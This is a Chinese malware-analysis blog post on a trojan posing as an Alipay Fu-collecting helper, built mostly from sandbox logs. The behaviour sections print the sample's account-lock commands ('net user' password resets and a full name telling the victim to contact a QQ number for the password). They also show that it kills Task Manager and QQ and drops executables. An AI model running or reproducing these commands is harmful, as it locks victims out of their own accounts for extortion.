支付宝集福增强工具源码分析
支付宝集福增强工具,是我认识的病毒作者天哥在数年前春节时写的病毒,本身没传播力,但是。。。
好奇心害死猫啊
今天来分析一下
感谢腾讯哈勃分析系统(habo.qq.com)和微步云沙箱(s.threatbook.cn)提供的技术支持
样本:后台回复024
文件名称:
支付宝集福增强工具.exe
SHA256:9ec7316691b56ba703c70b624c6ef4cde47c14a881b4607fddf4a30a3234f01d
测试运行环境:win7_sp1_enx86_office2013
样本类型:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
样本大小:17351168
MD5:dffe6e34209cb19ebe720c457a06edd6
SHA1:5851b96dd37e24799a1eaf17778beb322d714a8b
SSDeep:93216:34bE4rgyzGhTN9T7YtJXeeZyCefHFSSLyZHH:34b9R4j/SJXIdxyZHH
| 壳或编译器信息: | PACKER:UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo |
样本标签:Trojan(木马)AddUser(账户锁)PE32lang_chinese
多引擎检出率9/25
反病毒引擎
检测结果
ESET
Win32/AddUser.BG trojan
大蜘蛛(Dr.Web)
Trojan.Siggen7.57156
Baidu
Trojan.QQThief.Heur.gen
AVG
Trojan horse Atros4.CGGW
安天(Antiy)
Trojan/Generic.ASSuf.21B96
IKARUS
Trojan.Win32.AddUser
K7
Trojan ( 005039391 )
Avast
Win32:Malware-gen
腾讯(Tencent)
Win32.Trojan-qqpass.Qqrob.Wxry
瑞星(Rising)
Trojan.AddUser!8.E12
威胁情报 IOC
行为签名
高危行为(2)
一般行为:表示对指定运行的进程感兴趣(process: potential process injection targetsvchost.exe)
修改壁纸:
registry
HKEY_CURRENT_USER\Control Panel\Desktop\Wallpaper
registry
HKEY_CURRENT_USER\Control Panel\Desktop\WallpaperStyle
registry
HKEY_CURRENT_USER\Control Panel\Desktop\TileWallpaper
可疑行为(6)
这个二进制可能包含被加密或被压缩的数据,可能被加壳
| section: | size_of_data:"0x01073c00" virtual_address:"0x005e2000" entropy:7.88305649944682 name:"UPX1" virtual_size:"0x01074000" |
|---|---|
| entropy: | 7.88305649944682 |
| entropy: | 0.9943046005842948 |
该可执行文件使用UPX进行压缩
| section: | UPX0 |
|---|---|
| section: | UPX1 |
系统环境探测:持续搜索一个未找到的进程
2019-08-10 20:24:49 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002a0 process_identifier :3704 |
0 | 0 |
2019-08-10 20:24:49 Process32NextW |
process_name :net1.exe snapshot_handle :0x0000029c process_identifier :3728 |
0 | 0 |
2019-08-10 20:24:49 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002a8 process_identifier :3740 |
0 | 0 |
2019-08-10 20:24:49 Process32NextW |
process_name :is32bit.exe snapshot_handle :0x000002a4 process_identifier :3760 |
0 | 0 |
2019-08-10 20:24:49 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002ac process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:49 Process32NextW |
process_name :conhost.exe snapshot_handle :0x000002b0 process_identifier :3856 |
0 | 0 |
2019-08-10 20:24:49 Process32NextW |
process_name :conhost.exe snapshot_handle :0x000002b4 process_identifier :3856 |
0 | 0 |
2019-08-10 20:24:49 Process32NextW |
process_name :inject-x86.exe snapshot_handle :0x000002b8 process_identifier :3900 |
0 | 0 |
2019-08-10 20:24:50 Process32NextW |
process_name :conhost.exe snapshot_handle :0x000002bc process_identifier :4020 |
0 | 0 |
2019-08-10 20:24:50 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002c0 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:50 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002c4 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:50 Process32NextW |
process_name :sc.exe snapshot_handle :0x000002c8 process_identifier :2104 |
0 | 0 |
2019-08-10 20:24:50 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002cc process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:50 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002d0 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:50 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002d4 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:50 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002d8 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:50 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002dc process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:50 Process32NextW |
process_name :inject-x86.exe snapshot_handle :0x000002e0 process_identifier :2268 |
0 | 0 |
2019-08-10 20:24:51 Process32NextW |
process_name :inject-x86.exe snapshot_handle :0x000002e4 process_identifier :2268 |
0 | 0 |
2019-08-10 20:24:51 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002e8 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:51 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002ec process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:51 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002f0 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:51 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002f4 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:51 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002f8 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:51 Process32NextW |
process_name :net1.exe snapshot_handle :0x000002fc process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:51 Process32NextW |
process_name :inject-x86.exe snapshot_handle :0x00000300 process_identifier :2476 |
0 | 0 |
2019-08-10 20:24:52 Process32NextW |
process_name :inject-x86.exe snapshot_handle :0x00000304 process_identifier :2508 |
0 | 0 |
2019-08-10 20:24:52 Process32NextW |
process_name :inject-x86.exe snapshot_handle :0x00000308 process_identifier :2508 |
0 | 0 |
2019-08-10 20:24:52 Process32NextW |
process_name :inject-x86.exe snapshot_handle :0x0000030c process_identifier :2508 |
0 | 0 |
2019-08-10 20:24:52 Process32NextW |
process_name :net1.exe snapshot_handle :0x00000310 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:52 Process32NextW |
process_name :cmd.exe snapshot_handle :0x00000314 process_identifier :2628 |
0 | 0 |
2019-08-10 20:24:52 Process32NextW |
process_name :conhost.exe snapshot_handle :0x00000318 process_identifier :2632 |
0 | 0 |
2019-08-10 20:24:52 Process32NextW |
process_name :conhost.exe snapshot_handle :0x0000031c process_identifier :2632 |
0 | 0 |
2019-08-10 20:24:52 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x00000320 process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:52 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x00000324 process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:52 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x00000328 process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:53 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x0000032c process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:53 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x00000330 process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:53 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x00000334 process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:53 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x00000338 process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:53 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x0000033c process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:53 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x00000340 process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:53 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x00000344 process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:53 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x00000348 process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:53 Process32NextW |
process_name :schtasks.exe snapshot_handle :0x0000034c process_identifier :2572 |
0 | 0 |
2019-08-10 20:24:54 Process32NextW |
process_name :net1.exe snapshot_handle :0x00000350 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:54 Process32NextW |
process_name :net1.exe snapshot_handle :0x00000354 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:54 Process32NextW |
process_name :net1.exe snapshot_handle :0x00000358 process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:54 Process32NextW |
process_name :net1.exe snapshot_handle :0x0000035c process_identifier :3752 |
0 | 0 |
2019-08-10 20:24:54 Process32NextW |
process_name :sc.exe snapshot_handle :0x00000360 process_identifier :188 |
0 | 0 |
扫描Windows任务栏,(常用于注入explorer)
2019-08-10 20:24:47 FindWindowW |
class_name :Shell_TrayWnd window_name : |
1 | 65610 |
2019-08-10 20:24:47 FindWindowW |
class_name :Shell_TrayWnd window_name : |
1 | 65610 |
2019-08-10 20:24:48 FindWindowA |
class_name :Shell_TrayWnd window_name : |
1 | 65610 |
2019-08-10 20:24:48 FindWindowA |
class_name :Shell_TrayWnd window_name : |
1 | 65610 |
2019-08-10 20:24:48 FindWindowA |
class_name :Shell_TrayWnd window_name : |
1 | 65610 |
枚举进程或线程
2019-08-10 20:24:48 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 664 |
2019-08-10 20:24:49 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 672 |
2019-08-10 20:24:49 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 668 |
2019-08-10 20:24:49 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 680 |
2019-08-10 20:24:49 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 676 |
2019-08-10 20:24:49 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 684 |
2019-08-10 20:24:49 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 688 |
2019-08-10 20:24:49 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 692 |
2019-08-10 20:24:49 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 696 |
2019-08-10 20:24:50 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 700 |
2019-08-10 20:24:50 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 704 |
2019-08-10 20:24:50 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 708 |
2019-08-10 20:24:50 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 712 |
2019-08-10 20:24:50 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 716 |
2019-08-10 20:24:50 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 720 |
2019-08-10 20:24:50 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 724 |
2019-08-10 20:24:50 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 728 |
2019-08-10 20:24:50 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 732 |
2019-08-10 20:24:50 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 736 |
2019-08-10 20:24:51 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 740 |
2019-08-10 20:24:51 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 744 |
2019-08-10 20:24:51 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 748 |
2019-08-10 20:24:51 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 752 |
2019-08-10 20:24:51 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 756 |
2019-08-10 20:24:51 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 760 |
2019-08-10 20:24:51 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 764 |
2019-08-10 20:24:51 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 768 |
2019-08-10 20:24:52 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 772 |
2019-08-10 20:24:52 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 776 |
2019-08-10 20:24:52 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 780 |
2019-08-10 20:24:52 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 784 |
2019-08-10 20:24:52 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 788 |
2019-08-10 20:24:52 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 792 |
2019-08-10 20:24:52 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 796 |
2019-08-10 20:24:52 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 800 |
2019-08-10 20:24:52 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 804 |
2019-08-10 20:24:52 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 808 |
2019-08-10 20:24:53 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 812 |
2019-08-10 20:24:53 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 816 |
2019-08-10 20:24:53 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 820 |
2019-08-10 20:24:53 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 824 |
2019-08-10 20:24:53 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 828 |
2019-08-10 20:24:53 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 832 |
2019-08-10 20:24:53 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 836 |
2019-08-10 20:24:53 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 840 |
2019-08-10 20:24:53 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 844 |
2019-08-10 20:24:54 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 848 |
2019-08-10 20:24:54 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 852 |
2019-08-10 20:24:54 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 856 |
2019-08-10 20:24:54 CreateToolhelp32Snapshot |
flags :2 process_identifier :0 |
1 | 860 |
使用windows实用程序代替windows的基础功能
net user Administrator 1224639518
cmdline
net user %username% 1224639518
cmdline
net user Administrator /fullname:要密码加QQ:1322856336
cmdline
net user %username% /fullname:要密码加QQ:1322856336
PE文件的节大小异常
UPX1
0x01073c00
url
http://www.imagemagick.org
url
file:///home/wwwroot/site/www.easyicon.net/cdn-img.easyicon.cn/src/5716/571610.png
获取系统信息
2019-08-10 20:24:46 GetSystemInfo |
processor_count :4 |
1 | 0 |
2019-08-10 20:24:47 GetSystemInfo |
processor_count :4 |
1 | 0 |
2019-08-10 20:24:47 GetSystemInfo |
processor_count :4 |
1 | 0 |
2019-08-10 20:24:47 GetSystemInfo |
processor_count :4 |
1 | 0 |
2019-08-10 20:24:47 GetSystemInfo |
processor_count :4 |
1 | 0 |
2019-08-10 20:24:47 GetSystemInfo |
processor_count :4 |
1 | 0 |
2019-08-10 20:24:47 GetSystemInfo |
processor_count :4 |
1 | 0 |
2019-08-10 20:24:47 GetSystemInfo |
processor_count :4 |
1 | 0 |
2019-08-10 20:24:47 GetSystemInfo |
processor_count :4 |
1 | 0 |
2019-08-10 20:24:47 GetSystemInfo |
processor_count :4 |
1 | 0 |
2019-08-10 20:24:47 GetSystemInfo |
processor_count :4 |
1 | 0 |
命令行控制台有数据输出
2019-08-10 20:24:50 WriteConsoleW |
buffer :The user name could not be found. console_handle :0x0000000b |
1 | 1 |
2019-08-10 20:24:50 WriteConsoleW |
buffer :More help is available by typing NET HELPMSG 2221. console_handle :0x0000000b |
1 | 1 |
2019-08-10 20:24:51 WriteConsoleW |
buffer :The user name could not be found. console_handle :0x0000000b |
1 | 1 |
2019-08-10 20:24:51 WriteConsoleW |
buffer :More help is available by typing NET HELPMSG 2221. console_handle :0x0000000b |
1 | 1 |
2019-08-10 20:24:51 WriteConsoleW |
buffer :The command completed successfully. console_handle :0x00000007 |
1 | 1 |
2019-08-10 20:24:51 WriteConsoleW |
buffer :The command completed successfully. console_handle :0x00000007 |
1 | 1 |
2019-08-10 20:24:52 WriteConsoleW |
buffer :The command completed successfully. console_handle :0x00000007 |
1 | 1 |
在临时目录中创建文件
2019-08-10 20:24:47
NtCreateFile
create_disposition :5
file_handle :0x00000298
filepath :C:\Users\vbccsb\AppData\Local\Temp\sj.exe
desired_access :0x40100080
file_attributes :128
filepath_r :\??\C:\Users\vbccsb\AppData\Local\Temp\sj.exe
create_options :96
status_info :2
share_access :0
10
2019-08-10 20:24:48
NtCreateFile
create_disposition :5
file_handle :0x0000029c
filepath :C:\Users\vbccsb\AppData\Local\Temp\xh.exe
desired_access :0x40100080
file_attributes :128
filepath_r :\??\C:\Users\vbccsb\AppData\Local\Temp\xh.exe
create_options :96
status_info :2
share_access :0
10
搜索并加载模块资源
2019-08-10 20:24:47 LoadResource |
module_handle :0x00400000 resource_handle :0x01a56cc8 pointer :0x01a6d988 |
1 | 27711880 |
在文件系统上创建可执行文件
C:\Users\vbccsb\AppData\Local\Temp\xh.exe
file
C:\Users\vbccsb\AppData\Local\Temp\sj.exe
版权
支付宝集福工具
文件版本
1.0.0.0
公司名称
支付宝集福工具
注释
支付宝集福工具
产品名称
支付宝集福工具
产品版本
1.0.0.0
文件说明
支付宝集福工具
语言
Chinese (Simplified) - China
//像上面这图里面的省略了
关键行为
| 行为描述: | 修改用户密码 |
| 详情信息: | ImagePath = , CmdLine = net user %username% /fullname:要密码加QQ:1322856336 ImagePath = , CmdLine = net user %username% 1224639518 ImagePath = , CmdLine = net user Administrator 1224639518 ImagePath = , CmdLine = net user Administrator /fullname:要密码加QQ:1322856336 |
| 行为描述: | 杀掉进程 |
| 详情信息: | C:\WINDOWS\system32\taskmgr.exe |
| 行为描述: | 获取窗口截图信息 |
| 详情信息: | Foreground window Info: HWND = 0x0001035c, DC = 0x0b010502. Foreground window Info: HWND = 0x00000000, DC = 0x00000000. Foreground window Info: HWND = 0x0001035e, DC = 0x0b010502. |
| 行为描述: | 杀掉QQ进程 |
| 详情信息: | C:\Program Files\Tencent\QQ\Bin\QQ.exe |